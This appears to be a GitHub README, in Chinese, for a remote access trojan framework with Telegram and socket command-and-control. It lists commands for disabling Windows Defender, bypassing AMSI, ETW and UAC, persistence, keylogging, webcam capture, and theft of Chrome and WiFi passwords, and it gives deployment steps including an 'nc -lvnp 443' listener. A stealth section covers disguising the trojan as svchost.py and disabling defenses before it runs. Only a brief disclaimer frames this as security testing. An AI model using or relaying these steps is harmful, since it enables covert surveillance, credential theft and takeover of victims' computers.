Adhi-hub07/Nexus-RAT-Framework
GitHub: Adhi-hub07/Nexus-RAT-Framework
一款集成 Telegram C2、加密通信、安全绕过、持久化与监控凭据提取等功能的远控木马框架,面向授权渗透测试与安全研究场景。
Stars: 0 | Forks: 0
# 🛡️ Nexus RAT Framework v2.0
## 🔥 功能
| 类别 | 能力 |
|----------|-------------|
| **🔒 加密** | AES-128 Fernet 加密的 C2 通信 |
| **🛡️ 安全绕过** | 禁用 Windows Defender、AMSI 绕过、ETW 绕过、UAC 绕过、Defender 排除项、禁用防火墙 |
| **🕵️ 反分析** | 反 VM 检测、反调试、沙箱检测、分析时自动终止 |
| **📌 持久化** | 启动文件夹、注册表 Run 键、计划任务 |
| **⌨️ 键盘记录器** | 捕获击键及对应窗口标题的实时记录 |
| **📸 监控** | 屏幕截图、摄像头抓拍、录音 |
| **🔑 凭据** | 提取 Chrome 密码、导出 WiFi 密码、窃取剪贴板内容 |
| **📁 文件操作** | 列表、读取、写入、上传、下载、删除 |
| **⚙️ 进程** | 列出进程、终止进程 |
| **🌐 网络** | 端口扫描器、ARP 扫描、网络信息、reverse shell |
| **😂 恶作剧** | 屏幕锁定、伪造的 BSOD、消息框 |
| **💣 自毁** | 立即清除所有痕迹 |
| **📱 Telegram C2** | 通过 Telegram bot 从世界任何地方进行控制 |
## 📁 文件
| 文件 | 描述 | 适用场景 |
|------|-------------|----------|
| `telegram_rat.py` | **Telegram C2 RAT** | 通过 Telegram 从任何地方进行控制(推荐) |
| `advanced_rat.py` | **加密 Socket C2 RAT** | 带有完全加密的直接 socket C2 |
| `stealth_rat.py` | **基础隐蔽 RAT** | 轻量级 reverse shell |
## 🚀 快速开始
### 选项 1:Telegram C2(推荐 — 可在任何地方工作)
#### 步骤 1:创建 Telegram Bot
1. 打开 Telegram,搜索 **@BotFather**
2. 发送 `/newbot`
3. 为其命名(例如 `Nexus C2 Bot`)
4. 复制 **bot token**(例如 `123456:ABC-DEF...`)
#### 步骤 2:配置 RAT
编辑 `telegram_rat.py` 并替换 token:
```
BOT_TOKEN = "YOUR_TELEGRAM_BOT_TOKEN_HERE"
```
#### 步骤 3:安装依赖
```
pip install requests pillow opencv-python pynput
```
#### 步骤 4:在目标机器上运行
```
python3 telegram_rat.py
```
#### 步骤 5:通过 Telegram 控制
1. 在 Telegram 中打开你的 bot
2. 发送 `/start`
3. 你将看到连接信标
4. 发送任何命令 — 结果将直接返回到 Telegram 中
### 选项 2:直接 Socket C2
#### 步骤 1:配置
编辑 `advanced_rat.py`:
```
C2_HOST = "YOUR_VPS_IP" # Your server IP
C2_PORT = 443 # HTTPS port (stealthier)
```
#### 步骤 2:安装依赖
```
pip install cryptography pillow pyWinhook pynput sounddevice scipy pythoncom wmi
```
#### 步骤 3:启动监听器(在你的 VPS 上)
```
nc -lvnp 443
```
#### 步骤 4:在目标机器上运行
```
python3 advanced_rat.py
```
## 📋 命令参考
### 🖥️ 系统命令
| 命令 | 描述 |
|---------|-------------|
| `sysinfo` | 完整的系统信息 |
| `whoami` | 当前用户 |
| `id` | 用户/组 ID |
| `ip` | 本地 IP 地址 |
| `admin` | 检查 admin/root 状态 |
| `hostname` | 机器主机名 |
### ⚡ Shell 命令
| 命令 | 描述 |
|---------|-------------|
| `shell ` | 执行任何 shell 命令 |
| `cmd ` | 执行 Windows 命令 |
| `powershell ` | 执行 PowerShell 命令 |
| `ps` | 列出所有正在运行的进程 |
| `kill ` | 通过 PID 终止进程 |
| `python ` | 执行 Python 表达式 |
### 📁 文件命令
| 命令 | 描述 |
|---------|-------------|
| `ls [path]` | 列出目录中的文件 |
| `cd ` | 更改工作目录 |
| `pwd` | 打印当前目录 |
| `cat ` | 读取文件内容 |
| `write path\|content` | 将内容写入文件 |
| `download ` | 下载文件(发送至 Telegram/C2) |
| `rm ` | 删除文件 |
| `mkdir ` | 创建目录 |
### 🛡️ 安全绕过命令
| 命令 | 描述 |
|---------|-------------|
| `defender` | 禁用 Windows Defender |
| `defender_exclusions` | 为用户目录添加 Defender 排除项 |
| `amsi` | 绕过 AMSI (Antimalware Scan Interface) |
| `etw` | 绕过 ETW (Event Tracing for Windows) |
| `uac` | 通过 fodhelper 方法绕过 UAC |
| `disable_firewall` | 禁用 Windows 防火墙 |
### 📌 持久化命令
| 命令 | 描述 |
|---------|-------------|
| `persist` | 安装持久化(启动文件夹 + 注册表 + 计划任务) |
| `unpersist` | 移除所有持久化机制 |
### 📸 监控命令
| 命令 | 描述 |
|---------|-------------|
| `screenshot` / `ss` | 捕获屏幕(发送图片) |
| `webcam` | 捕获摄像头(发送照片) |
| `keylog_start` | 启动键盘记录器 |
| `keylog_dump` | 导出已捕获的击键记录 |
| `keylog_stop` | 停止键盘记录器并清除日志 |
### 🔑 凭据命令
| 命令 | 描述 |
|---------|-------------|
| `wifi_creds` | 提取所有已保存的 WiFi 密码 |
| `chrome_creds` | 提取 Chrome 保存的密码 |
| `clipboard` | 获取剪贴板内容 |
### 🌐 网络命令
| 命令 | 描述 |
|---------|-------------|
| `network` | 显示网络配置 |
| `scanports ` | 扫描目标端口 (1-1024) |
| `reverse_shell ` | 反向连接到监听器 |
### 😂 恶作剧命令
| 命令 | 描述 |
|---------|-------------|
| `lock` | 锁定屏幕 |
| `msg ` | 显示消息框 |
| `bsod` | 触发伪造的 BSOD (Blue Screen of Death) |
### 🔧 实用命令
| 命令 | 描述 |
|---------|-------------|
| `hash ` | 生成 MD5 + SHA256 哈希 |
| `self_destruct` | 删除 RAT 及所有痕迹 |
| `help` | 显示完整命令列表 |
## 🌍 Telegram C2 — 从任何地方进行控制
### 为什么使用 Telegram C2?
- ✅ **无需 VPS** — 免费的 C2 通道
- ✅ **全球可用** — 可从任何国家进行控制
- ✅ **已加密** — Telegram E2E 加密
- ✅ **无需端口转发** — 只需要网络连接
- ✅ **支持移动端** — 可以通过手机进行控制
- ✅ **文件传输** — 屏幕截图和摄像头照片直接发送至聊天
- ✅ **隐蔽性** — 看起来像正常的 Telegram 流量
### 架构图
```
Target Machine Your Phone/Laptop
│ │
│ [Runs telegram_rat.py] │
│ │ │
│ ▼ │
│ Telegram API ◄───────────────── │
│ (api.telegram.org) Commands │
│ │ │
│ ▼ │
│ Results back to chat ──────────►│
```
## ⚠️ 隐蔽提示
1. **重命名文件** — 不要使用明显的名称
mv telegram_rat.py svchost.py
2. **使用 PythonW** (Windows) — 无控制台窗口
pythonw telegram_rat.py
3. **编译为 EXE** — 增加分析难度
pip install pyinstaller
pyinstaller --onefile --windowed --icon=app.ico telegram_rat.py
4. **使用持久化** — 重启后依然存活
persist
5. **先禁用 Defender** — 在运行之前
defender
amsi
etw
## 📦 依赖
### Telegram RAT
```
pip install requests pillow opencv-python pynput
```
### 高级 Socket RAT
```
pip install cryptography pillow pyWinhook pynput sounddevice scipy pythoncom wmi pyaudio opencv-python python-pptx
```
## 🧪 测试
此框架专为以下用途设计:
- ✅ 授权的渗透测试
- ✅ 红队行动
- ✅ 安全研究
- ✅ CTF 竞赛
- ✅ 教育目的
- ✅ 恶意软件分析研究
## ⚠️ 免责声明
此工具仅供**教育和授权的安全测试目的**使用。未经明确许可,对你不拥有或未获授权测试的系统使用此工具是违法的。作者不对因使用此工具而造成的任何滥用或损害负责。
**在测试之前,请务必获得适当的授权。**
## 📜 许可证
MIT 许可证 — 可免费用于授权目的。
## ⭐ 如果你觉得有用,请给这个仓库点个 Star!
标签:C2框架, HTTP工具, 子域名变形, 安全学习资源, 恶意软件, 漏洞挖掘, 网络信息收集, 远控木马, 逆向工具